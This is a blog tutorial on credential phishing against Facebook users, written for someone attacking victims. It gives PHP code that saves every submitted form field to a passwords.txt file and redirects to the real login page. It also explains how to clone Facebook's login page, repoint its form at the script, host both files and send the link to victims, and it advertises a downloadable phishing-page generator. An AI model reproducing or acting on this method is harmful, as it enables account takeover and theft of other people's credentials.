This tutorial will tell u abt how to make a fake login page and tap your victim by Phishing just as the way fish falls to the trap
1.) First part:Creating the Fake Login Page.
In this part of the tutorial I’m going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen Facebook as an example.
Part 1:
First we create a PHP script that will save the passwords in a text file.
Part 1:
First we create a PHP script that will save the passwords in a text file.
1.) Open notepad and put this code:
header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>
2.)Now save this as phishing.php
Note:
header (‘Location: https://login.facebook.com/login.php ’);
This URL is where the victim is redirected after logging in to you fake page.
The best way to do this is to go to the original site(in this case facebook) and try to login without username and password. Of course then the site will tell you that the username/password incorrect.Now copy that url and paste in that part of the phish.php script. As you can see the Facebook has got “https://login.facebook.com/login.php“
Now we have succesfully created the script that will save the password in a text file which will be later used to see logged victim password’s.
Part 2:
Now we go to http://www.facebook.com and right click / View Source.
Now we need to find the place where LOGIN button in facebook page send the user after clicking on it.
To do that we search for something like:
CODE
action=anything.
In this case we have:
action=”https://login.facebook.com/login.php?”
We replace that part with:
action=”phishing.php”
Then we copy the whole source and save this file as login.php.
Now upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go. Just give your victim the link to your Login.php file and every time they login that php script will create a file titled passwords.txt in the same directory as login.php and phish.php.Just open the password.txt and you will see the passwords.
The phishing link should be something like this:
http://somewebhosting.com/login. php —> Send this to your victim
And the txt file with the passwords like this:
http://somewebhosting.com/passwords.txt —> View the passwords with this one.
Still having trouble with phishing??? i can make it much easier for u, Ma friend frm Cyber Terrorist Team have made a software for people like u, to make it simple… Just Download the Application frm here, these will generate all the necessary phishing.php and login.php for u, You just need to upload it in some web host and send the link to Your friends to hack passwords…
DOWNLOAD SUPER FISHING
How to Use it:
1. Enter the URL of the login page( any social network site) in the first text box…
2. Name of the log file : were the passwords of victim is stored, name it as u want ie. anyname.txt
3. Name of login page, mostly login.php
4. Redirection : enter the login page of the website, u wnat to phish, for ex: www.facebook.com is u wanna phish, You should make https://login.facebook.com/login.php this link there…
5. finally click Build Phisher, it will generate output…
Source: Go Hacking
COMMENTS :
0 komentar to “Phishing Facebook Tutorial”
Posting Komentar